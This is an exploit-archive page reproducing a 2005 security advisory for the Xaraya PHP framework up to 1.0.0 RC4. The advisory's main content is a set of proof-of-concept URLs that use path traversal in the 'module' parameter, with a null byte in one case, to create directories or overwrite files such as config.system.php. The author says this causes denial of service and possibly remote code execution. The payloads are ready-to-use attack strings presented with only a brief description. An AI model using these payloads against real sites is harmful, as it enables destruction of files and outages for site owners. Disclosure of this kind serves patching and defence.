Advertisement






Xaraya <= 1.0.0 RC4 D.O.S / file corruption

CVE Category Price Severity
CWE-399 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2005-12-12
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005120001

Below is a copy:

Xaraya <= 1.0.0 RC4 D.O.S / file corruption

software:
site: http://www.xaraya.com
description: "Xaraya 1.0 Core is an Open Source web application framework
written in PHP"

vulnerable code in create() function in xarMLSXML2PHPBackend.php:

i) you can create an empty dir, in some cases this leads to D.O.S. condition,poc:

http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php
http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htacce
ss

ii) you can overwite any file on target system, using null char

example, D.O.S, overwriting a system file:

http://[target]/[path_to_xaraya]/index.php?module=../../../../config.sys
tem.php%00

this could lead to remode code execution condition even, if a user overwrite
some file where an inclusion path is defined

rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/xaraya1DOS.hmtl

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum